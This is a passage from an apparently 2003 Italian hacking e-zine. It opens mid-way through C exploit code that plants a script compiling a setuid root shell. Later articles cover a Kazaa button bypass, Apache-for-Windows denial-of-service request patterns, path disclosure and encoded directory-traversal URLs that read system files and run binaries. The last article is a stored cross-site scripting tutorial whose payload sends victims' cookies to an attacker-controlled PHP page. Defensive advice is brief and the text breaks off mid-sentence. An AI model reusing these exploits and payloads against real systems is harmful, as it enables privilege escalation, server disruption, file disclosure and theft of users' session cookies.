"setgid(0);\n"); fprintf(fd, "execl(\"/bin/bash\", \"-bash\", NULL);\n"); fprintf(fd, "return 0;\n"); fprintf(fd, "}\n"); fprintf(fd, "EOF\n"); fprintf(fd, "/usr/bin/gcc /tmp/shell.c -o /tmp/shell\n"); fprintf(fd, "/bin/chown root.root /tmp/shell\n"); fprintf(fd, "/bin/chmod 6711 /tmp/shell\n"); fprintf(fd, "echo NOW HERE IS YOUR ROOT SHELL\n"); fprintf(fd, "/tmp/shell\n"); fclose(fd); system("chmod +x /tmp/killall"); system("/usr/local/kde/bin/kpopup root shell"); return 0; } } ::[ MARSIO ]::   ___ ___ ___ ___ ____   | | | | | || | | | \   | | | | | || |__| | \   | |__| | | || __ | @ \   \____/ |_||_| |_|_|\_\     ::[ Research & Development ]:: ::[ Stage2 @ 2003 ]:: ::[ www.uiha.tk ]:: +--------------------------------------------------------------[open the file]-+ |[ HACKiNG ] | |-- Piccolo Bug Di Kazaa | |-- LordScinawa | | _________________________________________________________| |____________________/ Qui riporto un piccolissimo bug di Kazaa, il noto programma di file sharing. Chiaramente, quando il programma è aperto, e non si è connessi alla rete, alcuni pulsanti vengono disabilitati (Search, Traffic, Tell A Friend). Ecco come ho fatto per usare cazzà in tutte le sue funzionalita (a parte quelle che non comprendono il supporto della rete, come Search e il Download dei File): 1)Cliccate sul pulsante browser su Kazaa. 2)Andate su File e premete Disconnect 3)Chiudete il programma (anche dalla striscia di avvio, nei pulsanti in basso a destra) 4)Aprite Kazaa 5)Adesso win, tramite una finestra vi dirà che per viualizzare la pagina (tramite il browser Kazeeresco) bisogna essere connessi ad internet. I pulsaqnti non sono disabilitati, però la finestra del programma non è in primo piano e non ci si può cliccare sopra perchè win non lo premette. Problema: Come fare ad arrivare una finestra che mi permetta di mettere Kazaa in primo piano? Se premo il pulsante "non in linea", Kazaa torna il primo piano, mentre i pulsanti vengono disabilitati. QUINDI 6)Nella finestra in cui compare il messaggio sopracitato, premete "connetti". A questo punto vi comparirà la finestra di connessione, che permette di spostarsi da una finestra ad una applicazione. I PULSANTI DI KAZAA NON SONO DISABILITATI. VaNtAgGi I vantaggi di questo grande bug sono talmente tanti che ne elencherò solo uno. Kazaa permette, durante il downmload di un video di vederne la parte scaricata con la funzione Theater. Per vedere un file bisogna evidentemente selezionarlo, dal Pulsante Traffic, che però è disabilitato se non si è connessi. Con questo semplice exploit possiamo vedere la parte di film che abbiamo scaricato senza spendere un Euro... LordScinawa +--------------------------------------------------------------[open the file]-+ |[ HACKiNG ] | |-- L'indiano buggato | |-- Korn | | _________________________________________________________| |____________________/ a Little intro: Rieccomi finalmente a scrivere per INformazione Libera;e' dal primo numero che non scrivevo un'articolo infatti cyberdude mi aveva messo tra gli exmembri...Il passato e' il passato.. A little but powerful disclaimer: queste informazioni sono sviluppate solo per essere utlili ad admin e a sistemisti nell'aministrazione delle loro macchine. Se vengono usate in modo improprio , la responsabilita' e' solo dell'utente che ne usufruisce. let's start: In questo articolo vorrei parlare di un bug di Apache per windows. quando esso riceve 8192 bytes in una richiesta , va in crash internamente , manda un messaggio all'amministratore e lascia la connessione aperta continuamente. Il problema piu pesante in questo bug e' l'allocazione della memoria.Infatti possiamo mandare oltre alla richiesta di 8192 byte altre 100 stringhe dello stesso volume. In windows nt l'attacco e' pericoloso perche'l'amministratore e' l'unico che puo' vedere i messaggi e la lunga lista di connessioni in stato idle.Peccato non sia un bof quindi nn puo' essere usato da remoto. volete passare ai fatti e sapere come possiamo incasinare il trasporto di un server web per linux su una macchina winzoz? "Chiedete e vi sara' dato" diceva un uomo famoso piu o meno 2000 anni fa. 1) GET (8184 of "/") / 2) HEAD /(8182 of "A") / 3) GET (8184 of "/") / for 100 times: Accept: (8182 of "/") 4) GET (8177 of "/") HTTP/1.0 ekkovi le vostre brave rikieste. un'altro bug per la vostra gioia: Questo bug non e' pericoloso in quanto non fornisce accesso remoto al sistema o ad altri dati, ma per un attacker e' utile riuscire ad avere sempre piu' informazioni e dettagli riguardo il server per lanciare attacchi piu' efficaci. Con questo bug possiamo vedere il percorso ove e' installato Apache, cosi' ad esempio possiamo sapere se il server gira su una macchina Windows, se e' la seconda versione di Apache (Apache2) e naturalmente la versione del server (tutte informazioni utili se l'amministratore ha oscurato il campo Server od altre info riguardo il server, cosi' se il bug e' presente, sapremo per esempio che e' installata una versione di Apache antecedente la 2.0.40). Il bug in questione comunque sembra essere dovuto solo ad alcune configurazioni inerenti il linguaggio da usare di default. Comunque ecco un esempio. Dal browser inseriamo la seguente stringa: http://127.0.0.1/error/HTTP_NOT_FOUND.html.var Dopodiche' il server ci rispondera' con questa pagina: |Not Acceptable | |An appropriate representation of the requested resource /error/HTTP_NOT_FOUND.html.var could not be found on this server. |Available variants: | | * C:/server/Apache Group/Apache2/error/HTTP_NOT_FOUND.html.var , type text/html, language de | * C:/server/Apache Group/Apache2/error/HTTP_NOT_FOUND.html.var , type text/html, language en | * C:/server/Apache Group/Apache2/error/HTTP_NOT_FOUND.html.var , type text/html, language es | * C:/server/Apache Group/Apache2/error/HTTP_NOT_FOUND.html.var , type text/html, language fr Come possiamo vedere il server ci risponde riportando tutto il percorso del file che abbiamo richiesto. Possiamo richiedere tutti i files .var nella directory error ed avremo lo stesso risultato. Maggiori dettagli sono reperibili sul sito di Apache http://httpd.apache.org Il seguente problema e' inerente la gestione dei caratteri "pericolosi" che possono essere utilizzati per lanciare alcuni attacchi, come appunto il directory traversal. Infatti il carattere backslash ('\' == %5c) e' riconosciuto dal webserver tra questi caratteri "particolari", ma il problema risiede nell'utilizzo da parte dell'attacker di directory "esterne" quali /cgi-bin/ ed /error/. Di conseguenza i sistemi vulnerabili sono tutti quelli che utilizzano il backslash per delimitare i percorsi (Windows, Netware e OS2). Ecco alcuni esempi: per vedere il file winn\win.ini: http://127.0.0.1/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini per eseguire l'utility wintty nella cartella Apache2/bin: http://127.0.0.1/cgi-bin/%5c%2e%2e%5cbin%5cwintty.exe?%2dt+HELLO In una forma piu' "leggibile" queste due stringhe significano: http://127.0.0.1/error/\..\..\..\..\winnt\win.ini http://127.0.0.1/cgi-bin/\..\bin\wintty.exe?-t+HELLO Cosi' nel primo esempio noi possiamo andare giu' fino al root con \..\..\..\..\ in quanto ci troviamo in "c:\programmi\Apache Group\Apache2\error". Invece nel secondo esempio utilizziamo /cgi-bin/ e passiamo gli argomenti con "file.exe?arg1+arg2+arg3+...". potete trovare tutte le patch sul sito di apache. Alla prox gente (per kualke kosa , flame o numeri di bella ragazze possibilmente romane e disponibili fury10@hotmail.com) +--------------------------------------------------------------[open the file]-+ |[ HACKiNG ] | |-- HTML Injection, come, dove e perchè | |-- Bigalex | | _________________________________________________________| |____________________/ ----==[ HTML Injection, COME, DOVE e PERCHÈ ]==---- < > Ricordo che diversi anni fa c'era un sito che permetteva di avere un dominio del tipo ciao.com, .net o .org gratuitamente per un anno, dopodichè bisognava acquistarlo. E ricordo che anche io avevo il mio dominio, bigalexitaly.com (bigalex.com era già stato preso :( ). Era una figata, solo che aveva della pubblicità in alto che dava abbastanza fastidio. Mi misi e, macchinando, riuscii a toglierla, grazie a quello che oggi chiameremmo HTML Injection. Cos'è l'HTML Injection? Si tratta dell'inserimento di codice arbitrario nel codice HTML. Direte voi 'E che minchia me ne frega?' (espressione alquanto colorita, devo dire). E vi dico io invece che è una cosa interessante perchè oltre al codice del tipo "> è possibile inserire anche roba più interessante (continuate a leggere, che vi lascio la suspance!). Il codice potrebbe anche essere sostituito dal seguente: %22%3E%3Cscript%3Ealert%28%22Ciao!%22%29%3C%2Fscript%3E Esso viene infatti ugualmente riconosciuto ed elaborato da un normale browser e si ottiene lo stesso effetto. Dove applicare la tecnica dell'HTML Injection? Per usare la tecnica dell'HTML Injection sono due le condizioni necessarie per la buona riuscita del 'test'. - Prima cosa bisogna che un sito mostri qualcosa a molti utenti, ad esempio un sito di annunci personali sarebbe perfetto. - Seconda cosa ovviamente bisogna che il sito sia vulnerabile (e non lo è sempre; alla fine vi spiegherò come appunto è necessario che siano le pagine affinchè il sito sia protetto contro l' attacco in questione). Il sito deve avere in pratica un box ove sia possibile inserire dei dati (ad esempio del testo da mostrare poi agli altri utenti). Sarebbe ancor meglio se avesse uno spazio per inserire una foto. Direte voi 'Si, ma al massimo posso farli uscrire scritto Ciao! Questa tecnica è inutile!!'. E qui viene il bello. In Java Script è presente un comando interessante e cioè Document.Cookie (che non è un comando, ma una variabile, vabbè :) e che mostra i cookies attivi nella pagina. A questo punto ciò che dovremo fare è semplicemente inviarcelo, in modo da avere i cookies di tutti gli utenti. Come fare per invircelo? Sembra difficile ma non lo è affatto, basta fare una pagina in php (o in asp, a scelta, ma io preferisco di più il php, l'asp fa un pò cagare :) che si segni tutti i cookies (ad esempio in un database, questo poi potete deciderlo voi come più vi pare :) degli utenti. La pagina php sarà linkata in questo modo: mettiamo che il sito da attaccare abbia uno spazio per mettere una foto. Il codice per inserire una foto è . A questo punto interveniamo noi inserendo il nostro codice http://miosito.com/script.php?cookie="+document.cookie+" (virgolette comprese!) che ci permetterà di inviare le informazioni al nostro sito. Se vogliamo poi fare qualcosa di ancor più pulito, possiamo far si che la nostra pagina invii anche un'immagine, cosicchè nessuno si accorga di nulla. Per fare tutto ciò occorre però che l'immagine sia linkata alla sua effettiva posizione e non sia scaricata dal sito e collocata in uno spazio sul sito (cioè in pratica il nostro browser deve caricare la pagina http://miosito.com/script.php?cookie="+document.cookie+" e non l'immagine che il sito carichi in uno spazio suo ad esempio http://sito.daattaccare.com/upload/immagine287364.jpg altrimenti ovviamente non funzionerà!!). Come ovviare all'HTML Injection? Per risolvere questo problema basta effettuare una semplicissima operazione: sostituire rispettivamente i caratteri \, ", ', con i caratteri \\, \", \'. Bisogna inoltre eliminare ogni tipo di tag HTML (cioè